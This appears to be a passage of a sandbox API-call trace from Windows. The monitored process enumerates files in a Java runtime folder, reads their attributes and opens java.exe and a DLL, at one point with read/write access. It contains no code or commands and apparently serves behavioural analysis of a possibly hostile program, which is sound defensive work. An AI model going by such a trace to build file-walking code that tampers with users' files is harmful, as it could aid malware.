[0091.135] CloseHandle (hObject=0x360) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.136] AreFileApisANSI () returned 1 [0091.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0091.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 48 [0091.136] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040)) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0091.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.136] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java.exe", cAlternateFileName="")) returned 1 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0091.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0091.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.137] AreFileApisANSI () returned 1 [0091.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe", lpUsedDefaultChar=0x0) returned 48 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.137] AreFileApisANSI () returned 1 [0091.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0091.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 48 [0091.137] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.138] GetFileType (hFile=0x360) returned 0x1 [0091.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0091.138] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.138] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.138] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.138] CloseHandle (hObject=0x360) returned 1 [0091.138] AreFileApisANSI () returned 1 [0091.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0091.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 48 [0091.139] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.139] GetFileType (hFile=0x360) returned 0x1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0091.139] CloseHandle (hObject=0x360) returned 1 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.140] AreFileApisANSI () returned 1 [0091.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0091.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 48 [0091.140] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840)) returned 1 [0091.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22c40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="JavaAccessBridge-64.dll", cAlternateFileName="JAVAAC~1.DLL")) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.142] AreFileApisANSI () returned 1 [0091.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 63 [0091.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0091.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0091.142] AreFileApisANSI () returned 1 [0091.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e1c8 [0091.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 63 [0091.142] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.143] GetFileType (hFile=0x360) returned 0x1 [0091.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.143] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.143] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.144] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.144] CloseHandle (hObject=0x360) returned 1 [0091.144] AreFileApisANSI () returned 1 [0091.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e470 [0091.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, 